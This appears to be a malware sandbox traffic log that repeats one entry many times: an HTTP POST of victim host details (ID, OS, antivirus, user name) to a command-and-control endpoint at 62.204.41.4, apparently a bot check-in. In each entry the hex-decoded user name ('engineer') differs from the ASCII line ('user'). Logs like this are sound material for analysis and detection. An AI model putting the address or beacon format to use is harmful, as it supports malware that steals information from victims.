                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
